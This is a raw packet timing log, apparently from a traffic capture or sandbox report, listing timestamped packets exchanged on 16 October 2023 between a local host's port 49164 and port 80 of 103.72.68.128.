                                                Oct 16, 2023 09:58:27.735582113 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735615015 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735655069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735671043 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735708952 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735742092 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735783100 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735786915 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735826969 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735858917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.735894918 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.735989094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736028910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736069918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736094952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736107111 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736123085 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736157894 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736196995 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736248970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736284971 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736327887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736381054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736414909 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736450911 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736485958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736524105 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736522913 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736572027 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736588955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736627102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736643076 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736680984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736715078 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736754894 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736778021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736829996 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736840963 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736871958 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.736903906 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.736944914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737014055 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737051964 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737082005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737118959 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737153053 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737189054 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737237930 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737252951 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737273932 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737292051 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737340927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737380981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737399101 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737435102 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737504959 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737541914 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737597942 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737634897 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737688065 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737731934 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737833023 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737873077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737881899 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737916946 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.737972975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.737987041 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738008022 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738025904 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738076925 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738117933 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738166094 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738203049 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738267899 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738312960 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738322020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738358974 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738389015 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738445997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738451004 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738487959 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738506079 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738549948 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738598108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738637924 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738687992 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738723993 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738759041 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738802910 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738825083 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738841057 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738887072 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.738917112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.738948107 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739001036 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739022970 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739080906 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739105940 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739116907 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739146948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739186049 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739200115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739232063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739262104 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739298105 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739367008 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739406109 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739435911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739475012 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739551067 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739584923 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739593983 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739622116 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739654064 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739691019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739698887 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739736080 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739768028 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739804983 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739895105 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739931107 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.739959955 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.739999056 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740071058 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740086079 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740112066 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740128040 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740142107 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740186930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740219116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740257025 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740289927 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740330935 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740339994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740421057 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740434885 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740442038 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740458965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740475893 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740505934 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740545988 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740578890 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740611076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740622997 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740663052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740684032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740731955 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740748882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740787029 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740809917 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740848064 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.740955114 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.740994930 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741025925 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741060019 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741117954 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741149902 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741156101 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741183996 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741231918 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741260052 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741265059 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741295099 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741333961 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741365910 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741396904 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741413116 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741432905 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741449118 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741477966 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741513014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741574049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741610050 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741611958 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741645098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741712093 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741746902 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741791964 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741827965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741846085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741878986 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.741944075 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.741981983 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.742001057 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.742034912 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.742079973 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.742115021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.742115021 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.742168903 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.745439053 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.746846914 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.746884108 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.746901989 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.746973038 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747030020 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747088909 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747122049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747152090 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747203112 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747255087 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747278929 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747294903 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747325897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747365952 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747381926 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747419119 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747432947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747467995 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747545004 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747579098 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747597933 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747634888 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747663975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747699022 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747703075 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747740030 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747787952 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747817039 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747864962 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747951984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.747951984 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.747987032 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748007059 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748040915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748090982 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748125076 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748145103 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748179913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748212099 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748224974 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748245001 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748260021 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.748313904 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:27.748377085 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:27.757472038 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074119091 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074136019 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074217081 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074229956 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074328899 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074388981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074388981 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074548960 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074585915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074650049 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074687958 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074743032 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074781895 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074832916 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074876070 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.074906111 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.074948072 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075090885 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075128078 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075145960 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075181007 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075241089 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075278044 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075335026 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075375080 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075517893 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075553894 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075731039 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075767994 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075819016 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075854063 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075886965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075923920 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075938940 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.075973988 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.075992107 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076029062 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076041937 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076076984 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076100111 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076136112 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076154947 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076189995 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076234102 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076268911 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076385975 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076423883 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076482058 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076515913 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076576948 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076617002 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076798916 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076838970 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076883078 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076916933 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.076958895 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.076993942 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077073097 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077110052 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077159882 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077200890 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077251911 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077291965 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077310085 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077343941 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077425003 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077461004 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077519894 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077554941 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077672005 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077749014 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077748060 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077783108 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077791929 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077825069 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077831984 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077866077 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.077944994 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077971935 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.077984095 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078001022 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078036070 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078068972 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078088999 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078123093 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078154087 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078187943 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078210115 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078243017 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078274965 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078309059 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078399897 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078442097 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078517914 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078552961 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078553915 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078588009 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078685045 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078699112 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078737020 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078737974 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078773975 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078792095 CEST8049164103.72.68.128192.168.2.22
                                                Oct 16, 2023 09:58:28.078825951 CEST4916480192.168.2.22103.72.68.128
                                                Oct 16, 2023 09:58:28.078871965 CEST8049164103.72.68.128192.168.2.22
